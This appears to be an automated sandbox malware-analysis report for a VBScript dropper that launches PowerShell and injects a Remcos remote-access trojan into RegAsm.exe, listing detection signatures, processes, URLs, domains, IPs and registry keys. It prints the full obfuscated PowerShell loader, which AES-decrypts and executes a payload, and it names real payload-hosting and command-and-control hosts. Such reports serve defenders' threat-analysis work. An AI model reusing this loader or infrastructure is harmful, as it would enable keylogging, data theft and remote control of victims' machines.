Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ucancrosstheflowerbeautiytogetin.gIF.vbs"

Details

Is windows:	true
Is dropped:	false
PID:	5492
Target ID:	0
Parent PID:	4004
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ucancrosstheflowerbeautiytogetin.gIF.vbs"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	11:16:13
Date:	11/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7bf350000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution	System Summary
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation	System Summary
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: Script Initiated Connection	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Sigma detected: Potential Encoded PowerShell Patterns In CommandLine	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI99645972962600823844763280617644CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIzrLkMfCMq2rIsTPnsb8jY47nqz/Y3CrDhgWeqNwTLWPZq+63N4Yhb4EnQJlSBVsguiI84l7zQtwXUQDNIqA92qrVYISAWXhnAYlXALfgssFnno/A2WwlOAFMD/NaVHV+icZyMNgugo/qb9zXaAO8+cQKC7PRaSfFqfVh6ouLofUA5r9MdLhJcneg+mqvCsSeIs3qhIp0vL4z2IKMK2L+k3UqicZjYCi+pQuAnUnn6K9CK71T+oydLiK4GCe2wGcbgIv2DkqaxSHySRydLdHWL0Gi3gEyBH38YBdVu9yBq5glJrh9I8g3FMB1F3MmIaOPg1KNoX9pH1Ub1ee/WxI3psHt96qJfCOVjRl8WZBZ/25QPRntDiX3CNsajiC9dyuVj5z5gQi8aVHKqGC917SReapeeZ0Cc8AhgWyke24u2jHI0QVsseFLiJgwDrex02OunlMSaX32SzeO0kHYzd1RECVE6yk6v7aAq9+TvaqLALY88yliJbfXlcRGeV7edBQLXzJuY5KQ31nWGyUzNenSlvUEvmZXuZ8k9A/a2Nc9Hr3s8k5NMMd3H479dy8/86CJic0bNcnApcxv7O8Un7Ju+yY8SP4rtI3SMFC0vm2vpLwjRjG/9eze4vvZCB1bC8f/j50YLUH9CUo4HgkBoIZCb0IA3oePudi8YFi00YVldRxoxts1jNHBcXLNcewoBJlBHRwFDG6fjgHV3j6P9jnOqMagHomqR1aHltsLzaM+rrG8GFKA3J3po82f2qKuXUKy7JE0+mDm0JnNX+TJztMNCbMNgqBYdflFEp2ir4NAUKLUU1QI6UTgOqf4PlRc7UiCRv5vPMF8ozNN2xns8NMF/XFC9hNsKSURv09S9rBXrn02FWnZJ4f2fr++C52b/4/ckoDa4iu5B2+phXA02niHmmbYDev+Dqz2ElbsoeY3YzDdts+nrseEhOip+iFMPENsFezcvBhpr0l0fszFeuUa0GlaxS1ew1CovjoIVwUs8S/jgCqxTKcIXXBxWnKWm3mR4vwi0ajQV+tHJgy32K2BmV5rF4YAQ1h4Qibdg0vgE7IwO6h3m8kGFkXeiYajfraMYftsvnztTExQKxccg0Bb9EbeVBWg2rml5Kl3ZIKpVWMnz5/ObGF3ovPp2erk/L7gmbFngwPL//lX49kTOc2QoXA7+oy0WQq+27kjIPsYZU4QoG2ZwsKnnDBXN7JE9SwTsEt0kog7f1aKg45cO9g7n/iZfPMfyfKmzE30L9H+oIIvD4jJJkdyZ2H8X78p0NIUYSQ+QMYMOEimSClFq7FIXjTO6KnsBFBvotz1InJLUgn7bYMGX4n9kaJV5BsZGig70cx4ANxQI4IXuA72zIOoQf/xZghiHMzgvmO7qIopxTZ44FYpyt89FGblmTsodmcKBe7hqqYT5+Ec+oUO9PiPT70JaDUj/yn7c6VWECh38exGlPiARukcYHn0Ho0Z2CDitPLsNU63GCra3riIbidF39vAdcBK7G/mG0I+oPLcOQQ2RJmrQ+BkIEkh0ChRfeNyaysmJx2gLSjz89+Y0saZbkqtECuwufAtp9BHE7gldgIkSmHwLnFzwyDE7zg+ZAwyn5BddaTl09JKnhn4ILbZTSfV0zfiK/cyeHYryggXQ3fjKKpwaR9fo2PRyTC2gFYgRc0JenJ7MtMiZj5a6d9vzcezTdg3AD4Q5zn6pL9HSdvBQdB1Ta8P1l9O87UiBWx7fn/N5/Thfcm1Tb56BIzFYbrXiDB86dMeE2xNU4buN7tmTwFkQG+ILl+MdKPy0I37CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

Details

Is windows:	true
Is dropped:	false
PID:	3192
Target ID:	3
Parent PID:	5492
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI99645972962600823844763280617644CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIzrLkMfCMq2rIsTPnsb8jY47nqz/Y3CrDhgWeqNwTLWPZq+63N4Yhb4EnQJlSBVsguiI84l7zQtwXUQDNIqA92qrVYISAWXhnAYlXALfgssFnno/A2WwlOAFMD/NaVHV+icZyMNgugo/qb9zXaAO8+cQKC7PRaSfFqfVh6ouLofUA5r9MdLhJcneg+mqvCsSeIs3qhIp0vL4z2IKMK2L+k3UqicZjYCi+pQuAnUnn6K9CK71T+oydLiK4GCe2wGcbgIv2DkqaxSHySRydLdHWL0Gi3gEyBH38YBdVu9yBq5glJrh9I8g3FMB1F3MmIaOPg1KNoX9pH1Ub1ee/WxI3psHt96qJfCOVjRl8WZBZ/25QPRntDiX3CNsajiC9dyuVj5z5gQi8aVHKqGC917SReapeeZ0Cc8AhgWyke24u2jHI0QVsseFLiJgwDrex02OunlMSaX32SzeO0kHYzd1RECVE6yk6v7aAq9+TvaqLALY88yliJbfXlcRGeV7edBQLXzJuY5KQ31nWGyUzNenSlvUEvmZXuZ8k9A/a2Nc9Hr3s8k5NMMd3H479dy8/86CJic0bNcnApcxv7O8Un7Ju+yY8SP4rtI3SMFC0vm2vpLwjRjG/9eze4vvZCB1bC8f/j50YLUH9CUo4HgkBoIZCb0IA3oePudi8YFi00YVldRxoxts1jNHBcXLNcewoBJlBHRwFDG6fjgHV3j6P9jnOqMagHomqR1aHltsLzaM+rrG8GFKA3J3po82f2qKuXUKy7JE0+mDm0JnNX+TJztMNCbMNgqBYdflFEp2ir4NAUKLUU1QI6UTgOqf4PlRc7UiCRv5vPMF8ozNN2xns8NMF/XFC9hNsKSURv09S9rBXrn02FWnZJ4f2fr++C52b/4/ckoDa4iu5B2+phXA02niHmmbYDev+Dqz2ElbsoeY3YzDdts+nrseEhOip+iFMPENsFezcvBhpr0l0fszFeuUa0GlaxS1ew1CovjoIVwUs8S/jgCqxTKcIXXBxWnKWm3mR4vwi0ajQV+tHJgy32K2BmV5rF4YAQ1h4Qibdg0vgE7IwO6h3m8kGFkXeiYajfraMYftsvnztTExQKxccg0Bb9EbeVBWg2rml5Kl3ZIKpVWMnz5/ObGF3ovPp2erk/L7gmbFngwPL//lX49kTOc2QoXA7+oy0WQq+27kjIPsYZU4QoG2ZwsKnnDBXN7JE9SwTsEt0kog7f1aKg45cO9g7n/iZfPMfyfKmzE30L9H+oIIvD4jJJkdyZ2H8X78p0NIUYSQ+QMYMOEimSClFq7FIXjTO6KnsBFBvotz1InJLUgn7bYMGX4n9kaJV5BsZGig70cx4ANxQI4IXuA72zIOoQf/xZghiHMzgvmO7qIopxTZ44FYpyt89FGblmTsodmcKBe7hqqYT5+Ec+oUO9PiPT70JaDUj/yn7c6VWECh38exGlPiARukcYHn0Ho0Z2CDitPLsNU63GCra3riIbidF39vAdcBK7G/mG0I+oPLcOQQ2RJmrQ+BkIEkh0ChRfeNyaysmJx2gLSjz89+Y0saZbkqtECuwufAtp9BHE7gldgIkSmHwLnFzwyDE7zg+ZAwyn5BddaTl09JKnhn4ILbZTSfV0zfiK/cyeHYryggXQ3fjKKpwaR9fo2PRyTC2gFYgRc0JenJ7MtMiZj5a6d9vzcezTdg3AD4Q5zn6pL9HSdvBQdB1Ta8P1l9O87UiBWx7fn/N5/Thfcm1Tb56BIzFYbrXiDB86dMeE2xNU4buN7tmTwFkQG+ILl+MdKPy0I37CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)\|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	11:16:15
Date:	11/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6e3d50000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
VBScript performs obfuscated calls to suspicious functions	Data Obfuscation	Scripting
Yara detected Powershell download and execute	HIPS / PFW / Operating System Protection Evasion
Obfuscated command line found	Data Obfuscation	Command and Scripting Interpreter Deobfuscate/Decode Files or Information
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation	System Summary
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Sigma detected: Potential Encoded PowerShell Patterns In CommandLine	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Details

Is windows:	true
Is dropped:	false
PID:	3748
Target ID:	5
Parent PID:	3192
Name:	RegAsm.exe
Class:	system-tools
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Size:	65440
MD5:	0D5DF43AF2916F47D00C1573797C1A13
Time:	11:16:28
Date:	11/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x140000
Modulesize:	73728
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Remcos	Stealing of Sensitive Information
Yara detected Remcos RAT	AV Detection, E-Banking Fraud, Stealing of Sensitive Information, Remote Access Functionality
Yara detected UAC Bypass using CMSTP	Exploits
Injects a PE file into a foreign processes	HIPS / PFW / Operating System Protection Evasion	Process Injection
Installs a global keyboard hook	Key, Mouse, Clipboard, Microphone and Screen Capturing	Input Capture
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Writes to foreign memory regions	HIPS / PFW / Operating System Protection Evasion	Process Injection
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Public key (encryption) found	Cryptography	Archive Collected Data
Spawns processes	System Summary	Process Injection

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Details

Is windows:	true
Is dropped:	false
PID:	5068
Target ID:	6
Parent PID:	3192
Name:	RegAsm.exe
Class:	system-tools
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Size:	65440
MD5:	0D5DF43AF2916F47D00C1573797C1A13
Time:	11:16:28
Date:	11/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0xc00000
Modulesize:	73728
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Remcos	Stealing of Sensitive Information
Yara detected Remcos RAT	AV Detection, E-Banking Fraud, Stealing of Sensitive Information, Remote Access Functionality
Yara detected UAC Bypass using CMSTP	Exploits
Injects a PE file into a foreign processes	HIPS / PFW / Operating System Protection Evasion	Process Injection
Installs a global keyboard hook	Key, Mouse, Clipboard, Microphone and Screen Capturing	Input Capture
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Writes to foreign memory regions	HIPS / PFW / Operating System Protection Evasion	Process Injection
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Public key (encryption) found	Cryptography	Archive Collected Data
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	6504
Target ID:	4
Parent PID:	3192
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	11:16:15
Date:	11/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff66e660000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://ia803405.us.archive.org/16/items/new_image_202406/new_image.jpg

207.241.232.195

https://pastecode.dev/raw/6l7qjjrz/paste1.txt

172.66.40.229

sembe.duckdns.org

http://139.99.220.222/66266/ERVB.txt

139.99.220.222

https://pastecode.dev/raw/6l7qjjrz/paste1.txt-Langu

unknown

http://pesterbdd.com/images/Pester.png

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

https://pastecode.dev/raw/6l7qjjrz/paste1.txte

unknown

https://pastecode.dev

unknown

https://pastecode.dev/raw/6l7qjjrz/paste1.txt#

unknown

http://geoplugin.net/json.gpl8

unknown

https://pastecode.dev/raw/6l7qjjrz/paste1.txtm

unknown

https://github.com/Pester/Pester

unknown

http://geoplugin.net/json.gpSystem32

unknown

http://geoplugin.net/json.gpll

unknown

http://geoplugin.net/json.gp

178.237.33.50

https://pastecode.dev/raw/6l7qjjrz/paste1.txt?

unknown

http://ia803405.us.archive.org

unknown

https://pastecode.dev/raw/6l7qj

unknown

http://geoplugin.net/json.gp/C

unknown

https://pastecode.dev/raw/6l7qjjrz/paste1.txtB

unknown

https://pastecode.dev/raw/6l7qjjrz/paste1.txttps://pastecode.dev/raw/6l7qjjrz/paste1.txtVVC:

unknown

https://pastecode.dev/

unknown

http://geoplugin.net/json.gpR

unknown

https://ia803405.us.archive.org

unknown

https://aka.ms/pscore68

unknown

https://pastecode.dev/raw/6l7qjjrz/paste1.txt42

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

http://www.m_.

unknown

https://pastecode.dev/raw/6l7qjjrz/paste1.txtuU

unknown

There are 20 hidden URLs, click here to show them.

Domains

Name

Malicious

ia803405.us.archive.org

207.241.232.195

Details

Name:	ia803405.us.archive.org
IP:	207.241.232.195
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic	Networking
HTTP GET or POST without a user agent	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

sembe.duckdns.org

194.187.251.115

Details

Name:	sembe.duckdns.org
IP:	194.187.251.115
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
C2 URLs / IPs found in malware configuration	Networking	Application Layer Protocol
Uses dynamic DNS services	Networking	Application Layer Protocol
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

pastecode.dev

172.66.40.229

Details

Name:	pastecode.dev
IP:	172.66.40.229
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Script Initiated Connection	System Summary
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

171.39.242.20.in-addr.arpa

unknown

geoplugin.net

178.237.33.50

Details

Name:	geoplugin.net
IP:	178.237.33.50
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

207.241.232.195

ia803405.us.archive.org

United States

Details

IP:	207.241.232.195
TargetID:	3
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	United States
Countrycode:	USA
ASN number:	7941
ASN name:	INTERNET-ARCHIVEUS
Private:	false
Domain:	ia803405.us.archive.org

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

139.99.220.222

unknown

Canada

Details

IP:	139.99.220.222
TargetID:	3
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	Canada
Countrycode:	CAN
ASN number:	16276
ASN name:	OVHFR
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic	Networking
HTTP GET or POST without a user agent	Networking
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer

172.66.40.229

pastecode.dev

United States

Details

IP:	172.66.40.229
TargetID:	0
Current Path:	C:\Windows\System32\wscript.exe
Country:	United States
Countrycode:	USA
ASN number:	13335
ASN name:	CLOUDFLARENETUS
Private:	false
Domain:	pastecode.dev

Signature Hits	Behavior Group	Mitre Attack
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Script Initiated Connection	System Summary
Uses secure TLS version for HTTPS connections	Compliance, Networking

194.187.251.115

sembe.duckdns.org

United Kingdom

Details

IP:	194.187.251.115
TargetID:	6
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Country:	United Kingdom
Countrycode:	GBR
ASN number:	9009
ASN name:	M247GB
Private:	false
Domain:	sembe.duckdns.org

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

178.237.33.50

geoplugin.net

Netherlands

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Rmc-999Z97

exepath

HKEY_CURRENT_USER\SOFTWARE\Rmc-999Z97

licence

HKEY_CURRENT_USER\SOFTWARE\Rmc-999Z97

time